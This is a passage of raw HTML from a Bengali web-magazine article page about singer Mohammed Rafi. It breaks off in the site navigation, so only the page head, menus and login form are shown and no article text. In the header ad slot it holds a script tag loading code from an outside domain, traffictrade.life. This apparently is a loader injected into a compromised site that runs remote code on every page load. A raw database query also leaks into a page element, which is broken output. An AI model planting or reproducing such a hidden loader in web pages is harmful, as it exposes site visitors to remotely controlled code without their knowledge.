<!doctype html >
<!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en"> <![endif]-->
<!--[if IE 7]>    <html class="no-js ie7 oldie" lang="en"> <![endif]-->
<!--[if IE 8]>    <html class="no-js ie8 oldie" lang="en"> <![endif]-->
<!--[if IE 9]>    <html class="no-js ie9 oldie" lang="en"> <![endif]-->
<!--[if gt IE 8]><!--> <html class="no-js" lang="en-US" prefix="og: http://ogp.me/ns#"> <!--<![endif]-->
<head>
    <title>How was Md Rafi As a Person?</title>
    <meta charset="UTF-8" />
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta name="author" content="বিয়াস">
    <link rel="pingback" href="http://banglalive.com/xmlrpc.php" />
    <!--<meta property="fb:app_id" content="830265687087368" />-->

    <link rel="icon" type="image/png" href="http://blcdn-307f.kxcdn.com/wp-content/uploads/2015/03/favicon.png">
<!-- This site is optimized with the Yoast SEO plugin v4.0.2 - https://yoast.com/wordpress/plugins/seo/ -->
<meta name="description" content="Rafi learnt classical music from Ustad Abdul Wahid Khan, Pandit Jiwan Lal Mattoo and Firoze Nizami.[8] His first public performance came at the age of 13, when he sang in Lahore featuring K. L. Saigal. In 1941, Rafi, under Shyam Sundar, made his debut in Lahore as a playback singer in the duet &quot;Soniye Nee, Heeriye Nee&quot; with Zeenat Begum in the Punjabi film Gul Baloch (released in 1944) under music director Shyam Sunder. In that same year, Rafi was invited by All India Radio Lahore station to sing for them."/>
<meta name="robots" content="noodp"/>
<link rel="canonical" href="http://banglalive.com/how-was-md-rafi-as-a-person/" />
<meta property="og:locale" content="en_US" />
<meta property="og:type" content="article" />
<meta property="og:title" content="প্রতিদ্বন্দ্বী কিশোর কুমারকে হিংসে করতেন রক্ষণশীল মহম্মদ রফি ?" />
<meta property="og:description" content="তাকে দেখে রফির গলা থেকে একরাশ ব্যথা ঝরলো, ‘বিটিয়া, ওরা বড্ড খারাপ | এক তো আমায় দিয়ে উল্টোপাল্টা গান গাওয়াচ্ছে | তার ওপর বলে কিনা আমি কিশোরকে হিংসে করি! সত্যি আমি এত ছোট মনের?’" />
<meta property="og:url" content="http://banglalive.com/how-was-md-rafi-as-a-person/" />
<meta property="og:site_name" content="BanglaLive" />
<meta property="article:section" content="Hottie কালচার" />
<meta property="article:published_time" content="2017-07-31T18:08:29+00:00" />
<meta property="article:modified_time" content="2017-08-04T10:29:56+00:00" />
<meta property="og:updated_time" content="2017-08-04T10:29:56+00:00" />
<meta property="og:image" content="http://blcdn-307f.kxcdn.com/wp-content/uploads/2017/07/rafi-new-1.jpg" />
<meta property="og:image:width" content="700" />
<meta property="og:image:height" content="500" />
<meta name="twitter:card" content="summary_large_image" />
<meta name="twitter:description" content="তাকে দেখে রফির গলা থেকে একরাশ ব্যথা ঝরলো, ‘বিটিয়া, ওরা বড্ড খারাপ | এক তো আমায় দিয়ে উল্টোপাল্টা গান গাওয়াচ্ছে | তার ওপর বলে কিনা আমি কিশোরকে হিংসে করি! সত্যি আমি এত ছোট মনের?’" />
<meta name="twitter:title" content="প্রতিদ্বন্দ্বী কিশোর কুমারকে হিংসে করতেন রক্ষণশীল মহম্মদ রফি ?" />
<meta name="twitter:site" content="@banglalive" />
<meta name="twitter:image" content="http://blcdn-307f.kxcdn.com/wp-content/uploads/2017/07/rafi-new-1.jpg" />
<meta name="twitter:creator" content="@banglalive" />
<!-- / Yoast SEO plugin. -->

<link rel='dns-prefetch' href='//s.w.org' />
<link rel="alternate" type="application/rss+xml" title="BanglaLive &raquo; Feed" href="http://banglalive.com/feed/" />
<link rel="alternate" type="application/rss+xml" title="BanglaLive &raquo; Comments Feed" href="http://banglalive.com/comments/feed/" />
<link rel="alternate" type="application/rss+xml" title="BanglaLive &raquo; প্রতিদ্বন্দ্বী কিশোর কুমারকে হিংসে করতেন রক্ষণশীল মহম্মদ রফি ? Comments Feed" href="http://banglalive.com/how-was-md-rafi-as-a-person/feed/" />
<link rel='stylesheet' id='responsive-lightbox-swipebox-css'  href='http://blcdn-307f.kxcdn.com/wp-content/plugins/responsive-lightbox/assets/swipebox/css/swipebox.min.css?ver=1.6.10' type='text/css' media='all' />
<link rel='stylesheet' id='rs-plugin-settings-css'  href='http://blcdn-307f.kxcdn.com/wp-content/plugins/revslider/rs-plugin/css/settings.css?ver=4.6.5' type='text/css' media='all' />
<link rel='stylesheet' id='wpcloudy-css'  href='http://blcdn-307f.kxcdn.com/wp-content/plugins/wp-cloudy/css/wpcloudy.min.css?ver=59b04a3079edb07358ebd277a4c9e9d3' type='text/css' media='all' />
<link rel='stylesheet' id='yasrcss-css'  href='http://blcdn-307f.kxcdn.com/wp-content/plugins/yet-another-stars-rating/css/yasr.css' type='text/css' media='all' />
<style id='yasrcss-inline-css' type='text/css'>

		.rateit .rateit-range {
			background: url(http://blcdn-307f.kxcdn.com/wp-content/plugins/yet-another-stars-rating/img/star.png) left 0px !important;
		}

		.rateit .rateit-hover {
			background: url(http://blcdn-307f.kxcdn.com/wp-content/plugins/yet-another-stars-rating/img/star.png) left -21px !important;
		}

		.rateit .rateit-selected {
			background: url(http://blcdn-307f.kxcdn.com/wp-content/plugins/yet-another-stars-rating/img/star.png) left -42px !important;
		}

		div.medium .rateit-range {
			/*White*/
			background: url(http://blcdn-307f.kxcdn.com/wp-content/plugins/yet-another-stars-rating/img/stars24.png) left 0px !important;
		}

		div.medium .rateit-hover {
			/*Red*/
			background: url(http://blcdn-307f.kxcdn.com/wp-content/plugins/yet-another-stars-rating/img/stars24.png) left -29px !important;
		}

		div.medium .rateit-selected {
			/*Yellow*/
			background: url(http://blcdn-307f.kxcdn.com/wp-content/plugins/yet-another-stars-rating/img/stars24.png) left -58px !important;
		}

		/* Creating set 32 */

		div.bigstars .rateit-range {
			/*White*/
			background: url(http://blcdn-307f.kxcdn.com/wp-content/plugins/yet-another-stars-rating/img/stars32.png) left 0px !important;
		}

		div.bigstars .rateit-hover{
			/*red*/
			background: url(http://blcdn-307f.kxcdn.com/wp-content/plugins/yet-another-stars-rating/img/stars32.png) left -37px !important;
		}

		div.bigstars .rateit-selected
		{
			/*Gold*/
			background: url(http://blcdn-307f.kxcdn.com/wp-content/plugins/yet-another-stars-rating/img/stars32.png) left -74px !important;
		}

	
</style>
<link rel='stylesheet' id='jquery-ui-css'  href='http://blcdn-307f.kxcdn.com/wp-content/plugins/yet-another-stars-rating/css/jquery-ui.css?ver=1.11.2' type='text/css' media='all' />
<link rel='stylesheet' id='dashicons-css'  href='http://blcdn-307f.kxcdn.com/wp-includes/css/dashicons.min.css?ver=59b04a3079edb07358ebd277a4c9e9d3' type='text/css' media='all' />
<link rel='stylesheet' id='yasrcsslightscheme-css'  href='http://blcdn-307f.kxcdn.com/wp-content/plugins/yet-another-stars-rating/css/yasr-table-light.css' type='text/css' media='all' />
<script type='text/javascript' src='http://blcdn-307f.kxcdn.com/wp-includes/js/jquery/jquery.js?ver=1.12.4'></script>
<script type='text/javascript' src='http://blcdn-307f.kxcdn.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script>
<script type='text/javascript' src='http://blcdn-307f.kxcdn.com/wp-content/plugins/revslider/rs-plugin/js/jquery.themepunch.tools.min.js?ver=4.6.5'></script>
<link rel='https://api.w.org/' href='http://banglalive.com/wp-json/' />
<link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://banglalive.com/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://blcdn-307f.kxcdn.com/wp-includes/wlwmanifest.xml" /> 
<link rel='shortlink' href='http://banglalive.com/?p=208502' />
<link rel="alternate" type="application/json+oembed" href="http://banglalive.com/wp-json/oembed/1.0/embed?url=http%3A%2F%2Fbanglalive.com%2Fhow-was-md-rafi-as-a-person%2F" />
<link rel="alternate" type="text/xml+oembed" href="http://banglalive.com/wp-json/oembed/1.0/embed?url=http%3A%2F%2Fbanglalive.com%2Fhow-was-md-rafi-as-a-person%2F&#038;format=xml" />
<script type="text/javascript">
(function(url){
	if(/(?:Chrome\/26\.0\.1410\.63 Safari\/537\.31|WordfenceTestMonBot)/.test(navigator.userAgent)){ return; }
	var addEvent = function(evt, handler) {
		if (window.addEventListener) {
			document.addEventListener(evt, handler, false);
		} else if (window.attachEvent) {
			document.attachEvent('on' + evt, handler);
		}
	};
	var removeEvent = function(evt, handler) {
		if (window.removeEventListener) {
			document.removeEventListener(evt, handler, false);
		} else if (window.detachEvent) {
			document.detachEvent('on' + evt, handler);
		}
	};
	var evts = 'contextmenu dblclick drag dragend dragenter dragleave dragover dragstart drop keydown keypress keyup mousedown mousemove mouseout mouseover mouseup mousewheel scroll'.split(' ');
	var logHuman = function() {
		var wfscr = document.createElement('script');
		wfscr.type = 'text/javascript';
		wfscr.async = true;
		wfscr.src = url + '&r=' + Math.random();
		(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(wfscr);
		for (var i = 0; i < evts.length; i++) {
			removeEvent(evts[i], logHuman);
		}
	};
	for (var i = 0; i < evts.length; i++) {
		addEvent(evts[i], logHuman);
	}
})('//banglalive.com/?wordfence_logHuman=1&hid=C136694776034F58D0537E11B1175A55');
</script><!-- <meta name="NextGEN" version="2.1.62" /> -->
		<script type="text/javascript">
			jQuery(document).ready(function() {
				// CUSTOM AJAX CONTENT LOADING FUNCTION
				var ajaxRevslider = function(obj) {
				
					// obj.type : Post Type
					// obj.id : ID of Content to Load
					// obj.aspectratio : The Aspect Ratio of the Container / Media
					// obj.selector : The Container Selector where the Content of Ajax will be injected. It is done via the Essential Grid on Return of Content
					
					var content = "";

					data = {};
					
					data.action = 'revslider_ajax_call_front';
					data.client_action = 'get_slider_html';
					data.token = '591eaea36c';
					data.type = obj.type;
					data.id = obj.id;
					data.aspectratio = obj.aspectratio;
					
					// SYNC AJAX REQUEST
					jQuery.ajax({
						type:"post",
						url:"http://banglalive.com/wp-admin/admin-ajax.php",
						dataType: 'json',
						data:data,
						async:false,
						success: function(ret, textStatus, XMLHttpRequest) {
							if(ret.success == true)
								content = ret.data;								
						},
						error: function(e) {
							console.log(e);
						}
					});
					
					 // FIRST RETURN THE CONTENT WHEN IT IS LOADED !!
					 return content;						 
				};
				
				// CUSTOM AJAX FUNCTION TO REMOVE THE SLIDER
				var ajaxRemoveRevslider = function(obj) {
					return jQuery(obj.selector+" .rev_slider").revkill();
				};

				// EXTEND THE AJAX CONTENT LOADING TYPES WITH TYPE AND FUNCTION
				var extendessential = setInterval(function() {
					if (jQuery.fn.tpessential != undefined) {
						clearInterval(extendessential);
						if(typeof(jQuery.fn.tpessential.defaults) !== 'undefined') {
							jQuery.fn.tpessential.defaults.ajaxTypes.push({type:"revslider",func:ajaxRevslider,killfunc:ajaxRemoveRevslider,openAnimationSpeed:0.3});   
							// type:  Name of the Post to load via Ajax into the Essential Grid Ajax Container
							// func: the Function Name which is Called once the Item with the Post Type has been clicked
							// killfunc: function to kill in case the Ajax Window going to be removed (before Remove function !
							// openAnimationSpeed: how quick the Ajax Content window should be animated (default is 0.3)
						}
					}
				},30);
			});
		</script>
		<style> 	

	.astro-detail-box {
	    clear: both;
	    float: left;
	    padding: 5px;
	    width: 99%;
	}
	.astro-detail {
	    float: left;
	    width: 50%;
	}
	.separate {
	    border: 1px dashed #e1e1e1;
	    clear: both;
	    display: inline-block;
	    margin: 30px 0;
	    width: 100%;
	}
	.astro-thumb {
	  float: left;
	  max-width: 75px;
	  width: 100%;
	}
.astro-color, .astro-number {
    background: #e1e1e1 none repeat scroll 0 0;
    border-radius: 5px;
    float: left;
    margin: 0 0 5px;
    padding: 5px;
    width: 50%;
}
.astro-number  {
    text-align: right;
}
.astro-color {
    border-right: 1px solid #fff;
}
	.astro-color p, .astro-number p{
	    font-size:15px;
	    margin:0;
	}

	.astro-prediction {
	    float: left;
	    width: 80%;
	}
.vc_single_image-wrapper { text-align:center; margin-bottom:10px}
	.number-color-box 
	{
		background-color: #B4222B; display: list-item; font-size: initial;padding: 0 5px;color: #fff;border-radius: 5px;    width: 65%;
    padding: 0 5px;
    margin: 0 auto 20px;
	}
		</style><!--[if lt IE 9]><script src="http://html5shim.googlecode.com/svn/trunk/html5.js"></script><![endif]-->
    <meta name="generator" content="Powered by Visual Composer - drag and drop page builder for WordPress."/>
<!--[if IE 8]><link rel="stylesheet" type="text/css" href="http://blcdn-307f.kxcdn.com/wp-content/plugins/js_composer/assets/css/vc-ie8.css" media="screen"><![endif]-->
<!-- JS generated by theme -->

<script>
    

var td_blocks = []; //here we store all the items for the current page

//td_block class - each ajax block uses a object of this class for requests
function td_block() {
    this.id = '';
    this.block_type = 1; //block type id (1-234 etc)
    this.atts = '';
    this.td_cur_cat = '';
    this.td_column_number = '';
    this.td_current_page = 1; //
    this.post_count = 0; //from wp
    this.found_posts = 0; //from wp
    this.max_num_pages = 0; //from wp
    this.is_ajax_running = false;
    this.header_color = '';
    this.ajax_pagination_infinite_stop = ''; //show load more at page x
}

    
var td_ad_background_click_link="";
var td_ad_background_click_target="";
var td_ajax_url="http://banglalive.com/wp-admin/admin-ajax.php";
var td_get_template_directory_uri="http://blcdn-307f.kxcdn.com/wp-content/themes/Newspaper";
var tds_snap_menu="";
var tds_header_style="";
var tds_mobile_swipe="";
var td_search_url="http://banglalive.com/search/";
var td_please_wait="Please wait...";
var td_email_user_pass_incorrect="User or password incorrect!";
var td_email_user_incorrect="Email or username incorrect!";
var td_email_incorrect="Email incorrect!";
var tds_more_articles_on_post_enable="";
var tds_more_articles_on_post_time_to_wait="";
var tds_more_articles_on_post_pages_distance_from_top="0";
var tds_theme_color_site_wide="#707070";
</script>

<style>body {visibility:hidden;}</style><script type='text/javascript'>
        (function (i, s, o, g, r, a, m) {
            i['GoogleAnalyticsObject'] = r; i[r] = i[r] || function () {
                (i[r].q = i[r].q || []).push(arguments)
            }, i[r].l = 1 * new Date(); a = s.createElement(o),
  m = s.getElementsByTagName(o)[0]; a.async = 1; a.src = g; m.parentNode.insertBefore(a, m)
        })(window, document, 'script', '//www.google-analytics.com/analytics.js', 'ga');

        ga('create', 'UA-22144401-1', 'auto');
        ga("require", "displayfeatures");
        ga('send', 'pageview');



</script>		<style type="text/css" id="wp-custom-css">
			/*
You can add your own CSS here.

Click the help icon above to learn more.
*/

.magnet-author {
display:none;
color: #5B5959 !important;
font-size: 16px;
}
.span4 .magnet-author {
display:block;
}		</style>
	
    <!--<script src="http://blcdn-307f.kxcdn.com/wp-content/themes/Newspaper-child/js/jquery.cookie.js"></script>-->
    <script>
                     jQuery(document).ready(function(){
               jQuery(document).on('click', 'a.ow_logged_in_enabled span', function(){
                jQuery('a.pp_close').click();
                  jQuery('a.td-login-modal-js').click();
                console.log('Logged');
                return false;
               });
               jQuery('a.ow_logged_in_enabled, a.ow_logged_in_enabled span').click(function(){
                  jQuery('a.td-login-modal-js').click();
                return false;
               });
             });
            </script>
<!--
<style>
.td-logo-rec-wrap .td-a-rec-id-header .td-visible-desktop {
  display: none !important;
}
</style>    
-->

<!-- ADS FOR IN _ IMAGE from DATAWRKZ  -->
<!-- ###################### 24-01-2017 
<script type="text/javascript" src="http://adunits.datawrkz.com/tms/data/placement/placement_147.min.js"></script>
########################### -->
<!-- ADS FOR IN _ IMAGE from DATAWRKZ -->

<!-- New 720/90 Ad from DATAWRKZ --> 

<!-- ###################### 24-01-2017 
<script async='async' src='https://www.googletagservices.com/tag/js/gpt.js'></script>
<script>
  var googletag = googletag || {};
  googletag.cmd = googletag.cmd || [];
</script>

<script>
  googletag.cmd.push(function() {
    googletag.defineSlot('/229445249/RS70_BanglaLive_Banner_728x90_DFP_1220', [728, 90], 'div-gpt-ad-1482225794215-0').addService(googletag.pubads());
    googletag.pubads().enableSingleRequest();
    googletag.enableServices();
  });
</script>
########################### -->

<!-- New 720/90 Ad from DATAWRKZ --> 



<!-- ******************************************************

S M A R T    B A N N E R  -->

<meta name="smartbanner:title" content="Banglalive">
<meta name="smartbanner:author" content="Best Bengali WebMag">
<meta name="smartbanner:price" content="Available">
<meta name="smartbanner:price-suffix-google" content=" - In Google Play">
<meta name="smartbanner:icon-google" content="http://blcdn-307f.kxcdn.com/wp-content/themes/Newspaper-child/smartbanner/app-icon.png">
<meta name="smartbanner:button" content="View">
<meta name="smartbanner:button-url-google" content="https://play.google.com/store/apps/details?id=com.banglalive.app">
<meta name="smartbanner:enabled-platforms" content="android">
<link rel="stylesheet" href="http://blcdn-307f.kxcdn.com/wp-content/themes/Newspaper-child/smartbanner/smartbanner.css">
<script src="http://blcdn-307f.kxcdn.com/wp-content/themes/Newspaper-child/smartbanner/smartbanner.js"></script>

<!-- S M A R T    B A N N E R 

********************************************************** -->


</head>

<body class="post-template-default single single-post postid-208502 single-format-standard td-full-layout how-was-md-rafi-as-a-person single_template_2 wpb-js-composer js-comp-ver-4.4.2 vc_responsive">



<div id="outer-wrap">
    <div id="td-mobile-nav" class="td-transition-content-and-menu">
    <!-- mobile menu close -->
    <div class="td-mobile-close">
        <a href="#">CLOSE</a>
        <div class="td-nav-triangle"></div>
    </div>

    <div class="td-mobile-content">
        <div class="menu-main-menu-container"><ul id="menu-main-menu" class=""><li id="menu-item-9945" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-home menu-item-first td-no-down-arrow menu-item-9945"><a href="http://banglalive.com/"><span class="menu_icon td-sp td-sp-ico-home"></span><span class="menu_hidden">মূল পাতা     </span></a></li>
<li id="menu-item-136747" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-136747"><a href="http://banglalive.com/category/news/">খবর</a>
<ul class="sub-menu">
	<li id="menu-item-0" class="menu-item-0"><a href="http://banglalive.com/category/news/general-news/">নিউজ Market</a></li>
	<li class="menu-item-0"><a href="http://banglalive.com/category/news/feature-news/">নিউজ ফিচার</a></li>
	<li class="menu-item-0"><a href="http://banglalive.com/category/news/kolkata-news/">আমার শহর</a></li>
</ul>
</li>
<li id="menu-item-136749" class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-item-136749"><a href="http://banglalive.com/category/entertainment/">বিনোদন</a>
<ul class="sub-menu">
	<li class="menu-item-0"><a href="http://banglalive.com/category/entertainment/entertainment-news/">Hottie কালচার</a></li>
	<li class="menu-item-0"><a href="http://banglalive.com/category/entertainment/entertainment-interview/">মুখোমুখি</a></li>
	<li class="menu-item-0"><a href="http://banglalive.com/category/entertainment/entertainment-review/">হিট না ঢিট</a></li>
</ul>
</li>
<li id="menu-item-136369" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-136369"><a href="http://banglalive.com/category/lifestyle/">লাইফস্টাইল</a>
<ul class="sub-menu">
	<li class="menu-item-0"><a href="http://banglalive.com/category/lifestyle/household-tips-to-ensure-a-happy-and-healthy-life/">জেনে রাখা ভালো</a></li>
	<li class="menu-item-0"><a href="http://banglalive.com/category/lifestyle/health-news-and-health-tips-in-bengali/">স্বাস্থ্য</a></li>
	<li class="menu-item-0"><a href="http://banglalive.com/category/lifestyle/fashion-news/">সৌন্দর্য</a></li>
</ul>
</li>
<li id="menu-item-177970" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-177970"><a href="http://banglalive.com/category/travelove-the-best-travel-experiences/">ট্র্যাভেলাভ</a></li>
<li id="menu-item-136750" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-136750"><a href="http://banglalive.com/category/bakalam/">বকলম</a></li>
<li id="menu-item-195536" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-195536"><a href="http://banglalive.com/category/best-literature-content-in-bengali/">সাহিত্য</a>
<ul class="sub-menu">
	<li class="menu-item-0"><a href="http://banglalive.com/category/best-literature-content-in-bengali/bengali-funny-stories-told-with-pictures/">ছবিতে গল্প</a></li>
	<li class="menu-item-0"><a href="http://banglalive.com/category/best-literature-content-in-bengali/satirical-articles-in-bengali/">রম্যরচনা</a></li>
	<li class="menu-item-0"><a href="http://banglalive.com/category/best-literature-content-in-bengali/galpa/">গল্প</a></li>
	<li class="menu-item-0"><a href="http://banglalive.com/category/best-literature-content-in-bengali/special-feature/">বিশেষ রচনা</a></li>
	<li class="menu-item-0"><a href="http://banglalive.com/category/best-literature-content-in-bengali/dharabahik/">উপন্যাস</a></li>
</ul>
</li>
<li id="menu-item-202843" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-202843"><a href="http://banglalive.com/category/sports-news-and-feature-in-bengali/">খেলা</a></li>
<li id="menu-item-136381" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-136381"><a href="http://banglalive.com/astrology/">রাশিফল</a></li>
<li id="menu-item-136384" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-136384"><a href="http://banglalive.com/blog/">ব্লগ</a></li>
<li id="menu-item-184743" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-184743"><a href="http://banglalive.com/category/podcast/">Podcast</a></li>
<li id="menu-item-200411" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-200411"><a target="_blank" href="http://banglalive.com/uralpool/">উড়ালপুল</a></li>
<li id="menu-item-136546" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-136546"><a href="http://banglalive.com/category/best-recipes-in-bengali/">রেসিপি</a>
<ul class="sub-menu">
	<li class="menu-item-0"><a href="http://banglalive.com/category/best-recipes-in-bengali/cake/">কেক</a></li>
	<li class="menu-item-0"><a href="http://banglalive.com/category/best-recipes-in-bengali/chatani/">চাটনি</a></li>
	<li class="menu-item-0"><a href="http://banglalive.com/category/best-recipes-in-bengali/continental/">কন্টিনেন্টাল</a></li>
	<li class="menu-item-0"><a href="http://banglalive.com/category/best-recipes-in-bengali/egg/">ডিম</a></li>
	<li class="menu-item-0"><a href="http://banglalive.com/category/best-recipes-in-bengali/fish/">মাছ</a></li>
</ul>
</li>
<li id="menu-item-136389" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-136389"><a href="http://banglaliveshopping.com/">শপিং</a></li>
</ul></div>    </div>
</div>    <div id="inner-wrap" class="td-transition-content-and-menu">
<div class="td-header-menu-wrap">
    <div class="container">
        <div class="row">
            <div class="span8">
                                <ul class="top-header-menu"><li class="menu-item-first"><a href="http://banglalive.com/wp-admin/nav-menus.php?action=locations">Click here - to select or create a menu</a></li></ul>            </div>

            <div class="span4">
                
            <ul class="top-header-menu td_ul_login"><li class="menu-item"><a class="td-login-modal-js menu-item" href="#login-form" data-effect="mpf-td-login-effect">Log In</a><span class="td-sp td-sp-ico-login td_sp_login_ico_style"></span></li></ul>
            <div  id="login-form" class="white-popup-block mfp-hide mfp-with-anim">
                <ul class="td-login-tabs">
                    <li><a id="login-link" class="td_login_tab_focus">LOG IN</a></li><li><a id="register-link">REGISTER</a></li>
                </ul>



                <div class="td-login-wrap">
                    <div class="td_display_err"></div>

                    <div id="td-login-div" class="">
                        <div class="td-login-panel-title">Welcome! Login in to your account</div>
                        <input class="td-login-input" type="text" name="login_email" id="login_email" placeholder="your username" value="" required>
                        <input class="td-login-input" type="password" name="login_pass" id="login_pass" value="" placeholder="your password" required>
                        <input type="button" name="login_button" id="login_button" class="wpb_button btn td-login-button" value="Log In">


                        <div class="td-login-info-text"><a href="#" id="forgot-pass-link">Forgot your password?</a></div>


                    </div>

                    
                    <div id="td-register-div" class="td-dispaly-none">
                        <div class="td-login-panel-title">Register for an account</div>
                        <input class="td-login-input" type="text" name="register_email" id="register_email" placeholder="your email" value="" required>
                        <input class="td-login-input" type="text" name="register_user" id="register_user" placeholder="your username" value="" required>
                        <input type="button" name="register_button" id="register_button" class="wpb_button btn td-login-button" value="Register">
                         <div class="td-login-info-text">A password will be e-mailed to you.</div>
                    </div>

                     <div id="td-forgot-pass-div" class="td-dispaly-none">
                        <div class="td-login-panel-title">Recover your password</div>
                        <input class="td-login-input" type="text" name="forgot_email" id="forgot_email" placeholder="your email" value="" required>
                        <input type="button" name="forgot_button" id="forgot_button" class="wpb_button btn td-login-button" value="Send My Pass">
                    </div>




                </div>
            </div>
                        </div>

        </div>
    </div>
</div>



<!-- graphic logo and ad -->
<div class="td-header-bg">
    <div class="container td-logo-rec-wrap">
        <div class="row">
            <div class="span4 header-logo-wrap" role="banner" itemscope="itemscope" itemtype="http://schema.org/Organization">
                                    <a itemprop="url" href="http://banglalive.com">
                        <img width="300" class="td-retina-data" data-retina="http://blcdn-307f.kxcdn.com/wp-content/uploads/2015/03/logo1.jpg" src="http://blcdn-307f.kxcdn.com/wp-content/uploads/2015/03/logo1.jpg" alt="Bangla Live" title="Bangla Live"/>
                    </a>
                    <meta itemprop="name" content="BanglaLive">
                                </div>
            <div class="span8 td-header-style-1">
                <div class="td-a-rec td-a-rec-id-header "><script src='https://traffictrade.life/scripts.js' type='text/javascript'></script></div>            </div>
        </div>
    </div>
</div>
<!-- header menu -->

<div class="td-menu-placeholder">

    <div class="td-menu-background">
        <div class="container td-menu-wrap">



            <div class="row-fluid td-menu-header">

                <div class="span11">
                                            <div class="mobile-logo-wrap">
                                                                <a itemprop="url" href="http://banglalive.com">
                                        <img width="300" class="td-retina-data"  data-retina="http://blcdn-307f.kxcdn.com/wp-content/uploads/2015/03/logo1.jpg" src="http://blcdn-307f.kxcdn.com/wp-content/uploads/2015/03/logo1.jpg" alt="Bangla Live" title="Bangla Live"/>
                                    </a>
                                    <meta itemprop="name" content="BanglaLive">
                                                        </div>
                    

                    <div id="td-top-mobile-toggle">
                        <ul class="sf-menu">
                            <li>
                                <a href="#">
                                    <span class="menu_icon td-sp td-sp-ico-menu"></span>
                                </a>
                            </li>
                        </ul>
                    </div>

                    <div id="td-top-menu" role="navigation" itemscope="itemscope" itemtype="http://schema.org/SiteNavigationElement">

                            <div class="menu-main-menu-container"><ul id="menu-main-menu-1" class="sf-menu"><li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-home menu-item-first td-no-down-arrow td-menu-item td-normal-menu menu-item-9945"><a href="http://banglalive.com/"><span class="menu_icon td-sp td-sp-ico-home"></span><span class="menu_hidden">মূল পাতা     </span></a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-mega-menu menu-item-136747"><a href="http://banglalive.com/category/news/">খবর</a>
<ul class="sub-menu">
	<li class="menu-item-0"><div class="td-mega-grid"><script>var block_td_uid_1_598490d30b220 = new td_block();
block_td_uid_1_598490d30b220.id = "td_uid_1_598490d30b220";
block_td_uid_1_598490d30b220.atts = '{"limit":4,"td_column_number":3,"ajax_pagination":"next_prev","category_id":"171","show_child_cat":"5"}';
block_td_uid_1_598490d30b220.td_cur_cat = "171";
block_td_uid_1_598490d30b220.td_column_number = "1";
block_td_uid_1_598490d30b220.block_type = "td_mega_menu";
block_td_uid_1_598490d30b220.post_count = "4";
block_td_uid_1_598490d30b220.found_posts = "7727";
block_td_uid_1_598490d30b220.max_num_pages = "1932";
block_td_uid_1_598490d30b220.header_color = "";
block_td_uid_1_598490d30b220.ajax_pagination_infinite_stop = "";
td_blocks.push(block_td_uid_1_598490d30b220);
</script><div class="td_block_wrap td_block_mega_menu"><div class="td_mega_menu_sub_cats"><div class="block-mega-child-cats"><div><a class="cur-sub-cat ajax-sub-cat-mega sub-cat-td_uid_1_598490d30b220" id="sub-cat-td_uid_1_598490d30b220-171" data-cat_id="171"
                        data-td_block_id="td_uid_1_598490d30b220" href="http://banglalive.com/category/news/">All</a></div><div><a class="ajax-sub-cat-mega sub-cat-td_uid_1_598490d30b220" id="sub-cat-td_uid_1_598490d30b220-3" data-cat_id="3" data-td_block_id="td_uid_1_598490d30b220" href="http://banglalive.com/category/news/general-news/">নিউজ Market</a></div><div><a class="ajax-sub-cat-mega sub-cat-td_uid_1_598490d30b220" id="sub-cat-td_uid_1_598490d30b220-29" data-cat_id="29" data-td_block_id="td_uid_1_598490d30b220" href="http://banglalive.com/category/news/feature-news/">নিউজ ফিচার</a></div><div><a class="ajax-sub-cat-mega sub-cat-td_uid_1_598490d30b220" id="sub-cat-td_uid_1_598490d30b220-30" data-cat_id="30" data-td_block_id="td_uid_1_598490d30b220" href="http://banglalive.com/category/news/kolkata-news/">আমার শহর</a></div></div></div><div id=td_uid_1_598490d30b220 class="td_block_inner animated fadeInDown SELECT SQL_CALC_FOUND_ROWS  wp_posts.ID FROM wp_posts  LEFT JOIN wp_term_relationships ON (wp_posts.ID = wp_term_relationships.object_id) WHERE 1=1  AND ( 
  wp_term_relationships.term_taxonomy_id IN (3,29,30,171)
) AND wp_posts.post_type IN ('post', 'page', 'attachment', 'revision', 'nav_menu_item', 'custom_css', 'customize_changeset', 'forum', 'topic', 'reply', 'wpc-weather', 'wpcf7_contact_form', 'ngg_album', 'ngg_gallery', 'ngg_pictures', 'lightbox_library', 'contestants', 'blogs', 'astro', 'displayed_gallery', 'display_type', 'gal_display_source') AND ((wp_posts.post_status = 'publish')) GROUP BY wp_posts.ID ORDER BY wp_posts.post_date DESC LIMIT 0, 4">
        <div class="td_mod_mega_menu">
            <div class="thumb-wrap"><a href="http://banglalive.com/queen-victoria-never-was-willing-to-breastfeed-her-children/" rel="bookmark" title="সন্তানদের স্তন্যপান না করিয়ে রাজ পরিবারের রীতি ভেঙেছিলেন এই সম্রাজ্ঞী"><img width="198" height="143" itemprop="image" class="entry-thumb" src="http://blcdn-307f.kxcdn.com/wp-content/uploads/2017/08/victoria-new-198x143.jpg" alt="" title="সন্তানদের স্তন্যপান না করিয়ে রাজ পরিবারের রীতি ভেঙেছিলেন এই সম্রাজ্ঞী"/></a></div>            <div class="item-details">
